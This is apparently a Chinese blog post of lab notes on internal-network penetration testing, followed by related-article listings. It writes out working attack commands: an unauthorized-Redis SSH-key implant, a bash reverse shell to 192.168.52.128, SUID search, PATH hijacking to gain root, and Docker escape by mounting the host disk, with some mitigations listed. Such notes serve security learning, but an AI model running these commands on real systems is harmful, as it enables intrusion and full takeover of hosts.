内网安全笔记

最新推荐文章于 2024-08-29 14:20:30 发布
最新推荐文章于 2024-08-29 14:20:30 发布
阅读量251 收藏 1
点赞数
文章标签: 安全 笔记 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cc777777777/article/details/130251965
版权

一、信息收集

通过nmap扫描ip的端口服务

nmap -T4 -p- -sV 172.31.103.184
-T4  扫描时间(一般不建议过快)
-p-  扫描全端口
-sV  扫描服务和版本
-O   扫描操作系统
-p 1-65535    扫描端口限制

在这里插入图片描述这里可以看出扫到22端口和80端口,分别是ssh 和http的端口,服务器和版本也可以看得到

常见端口:

21:FTP文件传输协议
22:SSH远程连接23:
23:TELNET远程登录:
25:SMTP邮件服务:
53:DNS域名系统
80:HTTP超文本传输协议
443:HTTPS安全超文本传输协议
1433:MSSQL
3306:MYSQL
3389:windows远程桌面服务端口
6379:redis默认端口
7701:weblogic
8080:TCP,HTTP协议代理服务器:Apache-tomcat默认端口号

第一个漏洞:redis未授权拿下目标主机

ssh服务登录的两种方式:
1:账号密码登录
2:密钥登录

redis未授权漏洞:
可以写入ssh公钥,再通过ssh连接进行攻击

kali中生成ssh公钥

ssh-keygen -t rsa
-t 指定哪种加密方式
rsa  非对称加密

回车后是选择保存的地址,此处默认即可
接下来将密钥添加到key.txt中

(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n" ) > key.txt

将生成的key.txt添加到redis缓冲区里

cat key.txt | redis-cli -h 192.168.97.225 -x xxx

进入到redis未授权里,将key.txt备份并命名为 authorized_keys

config set dir /root/.ssh
config set dbfilename authorized_keys
save

接下来即可通过ssh连接目标主机
由于是放在root目录下,直接就是root权限,不用提权

当权限过低,操作流程:
查看当前所处状态,是否处在一个docker容器下

cat /proc/self/cgroup

接下来进行提权

找一个
suid 
4000权限的文件
(相当于普通用户使用sudo,但执行结束权限也会消失)

接下来进行查找

find /-pem -u=s -type f 2>/dev/null

在这里插入图片描述
但是cd ..不能切换目录
解决方法:

更换一个shell
在自己本地使用nc工具
反弹一个shell,攻击机监听

nc -lvvp 666

bash -c 'exec bash -i &>/dev/tcp/192.168.52.128/666<&1'

监听和bash连接可以用不同的软件

用本地的机器监听目标反向shell的机器
获取到shell后还是低权限的shell
接下来在find中找到的shell文件
进入shell所在目录

./shell

执行该程序,发现跑了四个交互式
在这里插入图片描述

环境变量劫持

rm ps

此时提权方法为环境变量劫持

echo "/bin/sh" >ps
chmod 777 ps
cat ps

在这里插入图片描述

执行

echo $PATH

在这里插入图片描述

服务器中存在ps可执行命令,那么在执行ps命令的时候会根据环境变量的优先级寻找该命令文件,找到后才会执行
使用echo $PATH
当前环境变量的优先顺序
在这里插入图片描述
在环境变量前伪造一个ps文件,就能先执行伪造的那个环境变量
然后添加环境变量

export PATH=/tmp:$PATH
意味着在tmp目录下新建一个path

再执行echo $PATH
在这里插入图片描述

然后到jobs目录下执行.shell
whoami 就可以看到root权限
此时的root权限还是在docker环境下
在这里插入图片描述

完全交互式shell

使用python的方式将shell升级为完全交互式shell,
此处可以查看大佬写的博客:Linux 反向 shell 升级为完全可用的 TTY shell

python3 -c 'import pty;pty.spawn("/bin/bash")';

docker逃逸

四种方法:
1、docker daemon api未授权访问
2、privileged特权模式启动容器 #docker run -privilege
3、利用dirty cow来进行docker逃逸 脏牛
4、通过cve-2019-5736来达到docker逃逸

在这里插入图片描述

防止docker逃逸的方法
1、更新Docker版本到19.03.1及更高版本——CVE-2019-14271、覆盖CVE-2019-5736
2、runc版本>1.0-rc6 3、k8s 集群版本>1.12
4、Linux内核版本>=2.6.22—-CVE-2016-5195(脏牛)
5、Linux内核版本>=4.14–CVE-2017-1000405(大脏牛),未找到docker逃逸利用过程,但存在逃逸风险
6、不建议以root权限运行Docker服务 7、不建议以privileged(特权模式)启动Docker
8、不建议将宿主机目录挂载至容器目录
9、不建议将容器以—cap-add=SYSADMIN启动,SYSADMIN意为container进程允许执行mount、umount等一系列系统管理操作,存在容器逃逸风险

接下来在根目录新建文件夹

mkdir /hack

ls /dev

可以看到大量设备目录

mount /dev/sda^Hal ^H1 /hack

将目录挂载到hack文件夹,访问hack文件夹即可访问整个宿主机、
在这里插入图片描述
挂载完进行特权模式逃逸
两种方式:

  • 写计划任务,在宿主机上执行恶意命令
  • 生成ssh密钥直接连接
不能不通
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
宝塔面板数据库未授权访问(端口:888
墨痕诉清风的博客
11-16 4099
如果能直接访问phpmyadmin,则存在安全漏洞,务必第一时间修复,如有疑问,联系运维客服协助处理。1、软件版本为Linux面板7.4.2 或者Windows面板6.8.0。5、面板版本不为Linux面板7.4.2/Windows面板6.8.0。4、至少通过面板管理链接进入过phpmyadmin一次。3、安装了phpmyadmin,mysql数据库。2、针对888端口做了严格的安全认证,2、开放888且未配置http认证,3、未安装phpmyadmin,2020年8月护网行动爆出。1、未开放888端口,.
理解Docker cp漏洞CVE-2019-14271
Armandhe的博客
06-17 772
docker cp漏洞,写下来加深理解!!!
黑客常用端口利用总结
qq_43233085的博客
11-06 1364
黑客常用端口利用总结21:ftp/tftp/vsftpd文件传输协议22:ssh远程连接23:Telnet远程连接25/465:SMTP邮件服务53:DNS域名解析系统80/443:http/https135:DCOM服务139/445:Samba服务1433/1434:SQL Server服务1521:Oracle2049:NFS服务3306:mysql3389:Rdp远程桌面链接4899:ra...
CVE-2019-14271复现
PMJ的博客
11-26 2205
CVE-2019-14271:加载不受信任的动态链接库 docker cp依赖的docker-tar组件会加载容器内部的nsswitch动态链接库,但自身却未被容器化。 hacker可以通过劫持容器内的nsswitch动态链接库实现对宿主机进程的代码注入,获得宿主机上的代码执行能力 问题所在:高权限进程自身未容器化,却加载了不可控的动态链接库,一旦控制了容器就可以通过修改容器内动态链接库来实现在宿主机上以root权限执行任意代码。 原理 执行docker cp后,docker daemon会启动一个dock
PHP自学笔记 | phpmyadmin无法访问——开放888端口
shoujing1001的博客
12-07 2988
文章目录问题解决方法 问题 刚才的文章提到昨晚的问题,其实问题十分简单,但是一方面网上的教程说的太复杂,二是我对linux的操作命令不清楚,导致中途出了许多岔子。昨晚想去看一下数据库改一下数据,结果phpmyadmin一直无法访问,打开宝塔面板查看防火墙,发现888端口处于未使用状态。 解决方法 我在网上查阅了一下重新开放端口的操作,一个教程让我使用vi命令开启,但是由于命令生疏,中途出了一点错。...
CVE漏洞复现-CVE-2019-5736 Docker逃逸
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-22 3442
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口Docker环境和普通生产环境的差异在哪呢?举个列子,在普通的生产环境中,我们程序员写的代码产品在开发环境中能够运行起来,但却在测试环境中很容易出现各种的Bug,报错,这是因为两个环境中机器的配置和环境不一样所导致的而Docker的出现解决了这一差异性的问题。
linux docker漏洞,CVE-2019-14271:Docker史上最严重copy漏洞
weixin_29002935的博客
05-16 538
Docker修复了史上最严重的copy漏洞——CVE-2019-14271。Docker cpCopy命令允许从容器、向容器中、或容器之间复制文件。语法与标准的unix cp命令非常相似。要从容器中复制/var/logs,语法是docker cp container_name:/var/logs /some/host/path。从下图所示,要从容器中将文件复制出去,Docker使用了一个名为doc...
内网-内网安全攻防-笔记.pdf
09-18
内网安全攻防是网络安全领域的一个重要分支,主要关注的是在企业或组织内部网络中进行安全防护和渗透测试。内网通常指的是公司或机构内部的网络,而非面向公共互联网的开放网络。内网安全攻防涉及到一系列的手段和...
内网安全攻防-渗透测试指南 读书笔记.pdf
09-09
### 内网安全攻防-渗透测试指南 读书笔记 #### 一、内网渗透测试基础 在进行内网渗透测试之前,理解Powershell执行策略及其如何影响脚本运行至关重要。 - **Powershell执行策略**:Powershell的安全执行策略通过...
内网穿透笔记内网穿透笔记内网穿透笔记
09-07
在这个笔记中,我们将深入探讨“内网穿透”这一主题,特别是聚焦于“frp”(Fast Reverse Proxy)这个工具。 内网穿透的核心原理是通过一个公网服务器作为中转站,将公网的请求转发到内网的设备上,同时将内网设备...
详解Linux 查看服务器开放的端口
01-10
在讨论这个问题前,我们先来了解一下物理端口、逻辑端口端口号等计算机概念。 端口相关的概念: 在网络技术中,端口(Port)包括逻辑端口和物理端口两种类型。物理端口指的是物理存在的端口,如ADSL Modem、集线器、交换机、路由器上用 于连接其他网络设备的接口,如RJ-45端口、SC端口等等。逻辑端口是指逻辑意义上用于区分服务的端口,如TCP/IP协议中的服务端口端口号的范围从0到65535,比如用于浏览网页服务的80端口,用于FTP服务的21端口等。由于物理端口和逻辑端口数量较多,为了对端口进行区分,将每个端口进行了编号,这就是端口端口端口号可以分为3大类: 1:公认端口(Well
内网安全入门学习笔记day04
07-12
### 内网安全入门学习笔记day04:深入解析工作组权限及UAC管理 #### 一、本地工作组概念与管理 在本章节的学习笔记中,作者着重介绍了本地工作组的概念及其在计算机安全中的应用。首先,我们需要了解“本地工作组...
内网渗透笔记,课堂资料
03-11
在企业环境中,内网往往包含了敏感数据和关键业务系统,因此内网安全至关重要。这篇“内网渗透笔记,课堂资料”提供了一套系统性的学习资源,帮助读者了解和掌握内网渗透的相关知识。 一、内网渗透基础 内网渗透...
宝塔离线安装包_阿里云和腾讯云等封杀宝塔面板888端口 宝塔开发商已公布高危漏洞细节...
weixin_39774219的博客
11-20 2320
宝塔面板是个安装次数超过400 万次的服务器控制面板,该面板主要方便运维人员部署服务器环境和进行管理等。日前宝塔面板出现严重级别的高危安全漏洞,攻击者借助该漏洞可以直接访问数据库并删除数据库和入侵服务器。据蓝点网所知目前已经有部分网站遭到黑客和脚本小子攻击,相关数据库遭到黑客和脚本小子删除并进行勒索等。当然在公安部门的介入下已经部分高调的黑客或脚本小子被逮捕,在这里也提醒大家请勿以身试法...
一个意外错误使您无法复制该文件_Docker爆严重cp复制漏洞CVE-2019-14271,已经被修复...
weixin_39930748的博客
11-29 1112
概述在过去几年里,在各种容器平台(包括Docker,Podman和Kubernetes)中发现了复制(cp)命令的的多个漏洞。其中最严重的一个是今年7月才暴露的CVE-2019-14271。CVE-2019-14271源于Docker cp命令实现中的安全bug,当被攻击者利用时,该漏洞可能导致完全容器权限穿越。自从二月份发现严重的runC漏洞之后,第一个完全的容器穿越的漏洞。如果容器已经被篡改(...
TCP的连接建立:三次握手
Zyl_uncle的博客
04-22 529
前提条件:在一台主机(客户端)中的一个进程想和另一台主机(服务器端)上的一个进程建立一条连接,客户端应用进程首先通知客户端TCP,告知其想和一个服务器上的某个进程建立连接,客户中的TCP会通过三次握手与服务器的TCP建立一条属于TCP的连接。 第一次握手:客户端发送连接请求报文段,等待服务器确认,这个时候没有携带应用层数据。 此时同步位SYN=1,表明这是一个连接请求报文。seq=x 第二次握手:服务器端为该TCP连接分配缓存和变量,并且向客户端返回确认报文段,允许连接,也没有应用层数据。 此时SYN=1,
linux 25端口给入侵,最近非常火的宝塔漏洞 888端口的入侵
weixin_42509774的博客
05-05 1162
宝塔介绍“宝塔”这个网站程序,做过网站的朋友应该不会感到陌生。宝塔 为搭建在Linux主机上的网站,提供了一个强大的后台管理系统。让网站管理人员能更方便的,管理自己的网站服务器,并且可以通过手机随时随地,监控网站的一个流量波动。骇客篡改数据库然而就是这样一个强大服务器管理系统,前段时间就因为一个漏洞;上了百度的热搜榜。漏洞爆出的当天,不少网站都遭到了骇客的光顾。数据库的数据被 篡改、脱裤、甚至是删...
入侵常用端口详解
weixin_30916125的博客
02-22 1059
在渗透中端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口 第三方通用组件漏洞struts thinkphp jboss ganglia zabbix 80 web 80-89 web 8000-9090 web 2,数据库类(扫描弱口令) 1433 MSSQL 1521 Oracle 3306 MySQL 5432 PostgreSQL 3,特殊服务类(未...
乾元通渠道商中标湖南省煤业集团公司安全生产预防和应急救援能力建设装备配备采购项目
最新发布
QDLL123的博客
08-29 89
近日,乾元通渠道商中标湖南省煤业集团安全生产预防和应急救援能力建设装备配备采购项目,乾元通作为聚合通讯保障技术厂家,为项目一标段卫星通讯指挥车提供车载聚合路由器终端及系统。
红蓝对抗:渗透测试实战与内网安全策略
本文档是一份详细的读书笔记,聚焦于红蓝对抗和渗透测试在网络安全建设中的应用,主要探讨了如何通过渗透测试来评估和加强内网安全。首先,文档概述了渗透测试的基本概念,即通过模拟攻击者行为,识别潜在的安全漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值